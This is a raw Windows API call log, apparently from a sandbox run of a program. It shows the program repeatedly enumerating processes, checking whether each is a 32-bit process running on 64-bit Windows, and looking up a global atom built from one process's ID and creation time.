	[0106.046] CloseHandle (hObject=0x694) returned 1
	[0106.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0106.046] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.046] CloseHandle (hObject=0x694) returned 1
	[0106.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0106.046] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.046] CloseHandle (hObject=0x694) returned 1
	[0106.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0106.047] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0106.047] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0106.047] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0106.047] wsprintfA (in: param_1=0x39935b0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0106.047] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0106.048] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0106.048] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0106.048] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0106.048] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0106.048] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0106.048] CloseHandle (hObject=0x694) returned 1
	[0106.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0106.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0106.048] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.048] CloseHandle (hObject=0x694) returned 1
	[0106.049] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0106.049] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.049] CloseHandle (hObject=0x694) returned 1
	[0106.049] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0106.049] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.049] CloseHandle (hObject=0x694) returned 1
	[0106.087] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0106.087] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0106.087] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0106.087] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0106.087] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0106.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0106.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0106.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0106.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0106.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0106.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0106.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0106.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0106.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0106.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0106.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0106.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0106.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0106.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0106.089] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.089] CloseHandle (hObject=0x694) returned 1
	[0106.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0106.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0106.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0106.090] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.090] CloseHandle (hObject=0x694) returned 1
	[0106.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0106.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0106.090] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.090] CloseHandle (hObject=0x694) returned 1
	[0106.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0106.091] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.091] CloseHandle (hObject=0x694) returned 1
	[0106.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0106.091] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.091] CloseHandle (hObject=0x694) returned 1
	[0106.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0106.091] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.091] CloseHandle (hObject=0x694) returned 1
	[0106.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0106.091] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.091] CloseHandle (hObject=0x694) returned 1
	[0106.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0106.091] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.092] CloseHandle (hObject=0x694) returned 1
	[0106.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0106.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0106.092] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.092] CloseHandle (hObject=0x694) returned 1
	[0106.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0106.092] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.092] CloseHandle (hObject=0x694) returned 1
	[0106.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0106.092] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.092] CloseHandle (hObject=0x694) returned 1
	[0106.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0106.092] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.092] CloseHandle (hObject=0x694) returned 1
	[0106.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0106.093] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.093] CloseHandle (hObject=0x694) returned 1
	[0106.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0106.093] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.093] CloseHandle (hObject=0x694) returned 1
	[0106.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0106.093] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.093] CloseHandle (hObject=0x694) returned 1
	[0106.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0106.093] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.093] CloseHandle (hObject=0x694) returned 1
	[0106.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0106.100] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.100] CloseHandle (hObject=0x694) returned 1
	[0106.101] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0106.101] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.101] CloseHandle (hObject=0x694) returned 1
	[0106.101] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0106.101] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.101] CloseHandle (hObject=0x694) returned 1
	[0106.101] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0106.101] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.101] CloseHandle (hObject=0x694) returned 1
	[0106.101] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0106.101] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.101] CloseHandle (hObject=0x694) returned 1
	[0106.102] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0106.102] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.102] CloseHandle (hObject=0x694) returned 1
	[0106.102] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0106.102] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.102] CloseHandle (hObject=0x694) returned 1
	[0106.102] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0106.102] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.102] CloseHandle (hObject=0x694) returned 1
	[0106.102] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0106.102] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.102] CloseHandle (hObject=0x694) returned 1
	[0106.102] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0106.102] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.102] CloseHandle (hObject=0x694) returned 1
	[0106.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0106.103] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.103] CloseHandle (hObject=0x694) returned 1
	[0106.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0106.103] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.103] CloseHandle (hObject=0x694) returned 1
	[0106.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0106.103] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.103] CloseHandle (hObject=0x694) returned 1
	[0106.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0106.103] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.103] CloseHandle (hObject=0x694) returned 1
	[0106.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0106.104] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.104] CloseHandle (hObject=0x694) returned 1
	[0106.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0106.104] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0106.104] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0106.104] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0106.105] wsprintfA (in: param_1=0x39935b0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0106.105] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0106.105] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0106.105] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0106.105] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0106.106] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0106.106] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0106.106] CloseHandle (hObject=0x694) returned 1
	[0106.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0106.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0106.106] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.106] CloseHandle (hObject=0x694) returned 1
	[0106.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0106.106] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.106] CloseHandle (hObject=0x694) returned 1
	[0106.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0106.106] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.106] CloseHandle (hObject=0x694) returned 1
	[0106.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0106.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0106.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0106.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0106.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0106.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0106.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0106.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0106.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0106.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0106.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0106.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0106.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0106.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0106.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0106.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0106.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0106.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0106.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0106.150] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.150] CloseHandle (hObject=0x694) returned 1
	[0106.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0106.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0106.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0106.150] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.150] CloseHandle (hObject=0x694) returned 1
	[0106.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0106.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0106.150] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.150] CloseHandle (hObject=0x694) returned 1
	[0106.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0106.151] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.151] CloseHandle (hObject=0x694) returned 1
	[0106.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0106.151] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.151] CloseHandle (hObject=0x694) returned 1
	[0106.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0106.151] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.151] CloseHandle (hObject=0x694) returned 1
	[0106.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0106.151] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.151] CloseHandle (hObject=0x694) returned 1
	[0106.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0106.151] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.151] CloseHandle (hObject=0x694) returned 1
	[0106.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0106.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0106.152] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.152] CloseHandle (hObject=0x694) returned 1
	[0106.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0106.152] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.152] CloseHandle (hObject=0x694) returned 1
	[0106.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0106.152] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.152] CloseHandle (hObject=0x694) returned 1
	[0106.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0106.152] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.152] CloseHandle (hObject=0x694) returned 1
	[0106.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0106.153] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.153] CloseHandle (hObject=0x694) returned 1
	[0106.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0106.153] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.153] CloseHandle (hObject=0x694) returned 1
	[0106.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0106.153] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.153] CloseHandle (hObject=0x694) returned 1
	[0106.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0106.153] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.153] CloseHandle (hObject=0x694) returned 1
	[0106.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0106.153] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.153] CloseHandle (hObject=0x694) returned 1
	[0106.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0106.154] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.154] CloseHandle (hObject=0x694) returned 1
	[0106.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0106.154] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.154] CloseHandle (hObject=0x694) returned 1
	[0106.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0106.154] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.154] CloseHandle (hObject=0x694) returned 1
	[0106.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0106.154] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.154] CloseHandle (hObject=0x694) returned 1
	[0106.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0106.154] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.154] CloseHandle (hObject=0x694) returned 1
	[0106.155] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0106.155] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.155] CloseHandle (hObject=0x694) returned 1
	[0106.155] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0106.155] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.155] CloseHandle (hObject=0x694) returned 1
	[0106.155] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0106.155] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.155] CloseHandle (hObject=0x694) returned 1
	[0106.155] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0106.155] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.155] CloseHandle (hObject=0x694) returned 1
	[0106.155] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0106.155] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.155] CloseHandle (hObject=0x694) returned 1
	[0106.156] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0106.156] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.156] CloseHandle (hObject=0x694) returned 1
	[0106.156] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0106.156] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.156] CloseHandle (hObject=0x694) returned 1
	[0106.156] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0106.156] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.156] CloseHandle (hObject=0x694) returned 1
	[0106.156] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0106.156] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.156] CloseHandle (hObject=0x694) returned 1
	[0106.156] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0106.157] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0106.157] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0106.157] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0106.157] wsprintfA (in: param_1=0x3993c40, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0106.157] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0106.158] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0106.158] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0106.158] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0106.158] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0106.158] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0106.158] CloseHandle (hObject=0x694) returned 1
	[0106.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
